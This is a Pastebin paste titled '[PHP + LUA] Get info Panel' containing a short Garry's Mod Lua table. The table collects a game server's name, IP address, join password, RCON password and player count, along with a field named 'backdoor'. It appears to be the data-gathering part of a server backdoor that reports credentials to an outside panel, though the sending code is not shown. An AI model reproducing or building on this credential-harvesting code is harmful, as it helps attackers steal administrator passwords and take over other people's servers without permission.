Maxdace66

[PHP + LUA] Get info Panel.

Apr 9th, 2020
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. local infoSend = {
  2. maxplayer = tostring(game.MaxPlayers()),
  3. name = GetConVar("hostname"):GetString(),
  4. password = GetConVar("sv_password"):GetString() or "Not Found",
  5. player = tostring(#player.GetAll()),
  6. ip = game.GetIPAddress(),
  7. rcon = rcon_pw,
  8. map = game.GetMap(),
  9. gamemode = engine.ActiveGamemode(),
  10. backdoor = tostring(bckdoor),
  11. }
Advertisement
Add Comment
Please, Sign In to add comment